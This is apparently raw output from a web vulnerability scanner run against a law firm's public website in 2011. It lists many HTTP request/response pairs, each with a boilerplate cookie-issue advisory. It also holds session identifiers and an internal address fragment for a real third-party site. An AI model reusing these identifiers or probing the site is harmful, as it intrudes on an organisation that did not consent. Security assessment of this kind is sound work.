GET /aboutus HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A57%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D190%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:57 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /alumni HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D435%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:23 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aop HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D934%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:28 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 19 Jan 2011 15:49:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A07%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D268%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:07 GMT;path=/ location: http://www.joinfulbright.com Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dc/x22 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D5%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /downloads HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A58%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D752%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:58 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dubai HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2016%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:04 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:56 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /houston HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2094%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:54:25 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /industries HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D995%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:42 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insite HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /international HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A43%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1606%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:43 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jblount HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1481%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:19 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /languages HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:51:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A51%3A50%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1351%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:51:50 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/act_ticker_xml.cfm HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/fjLib/media/flash/news/newsTicker.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/ Content-Type: text/xml
<images>
<item> <news>Fulbright Partner Named Best FCPA Lawyer Outside of D.C.</news> <url>http://www.fulbright.com/index.cfm?fuseaction=news.detail&article_id=9405&site_id=286< ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /newsTicker.swf HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/dc Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:46 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /newyork HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:55:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A55%3A29%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2404%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:55:29 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /offices HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:51:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A51%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1160%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:51:14 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rss HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1602%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:42 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
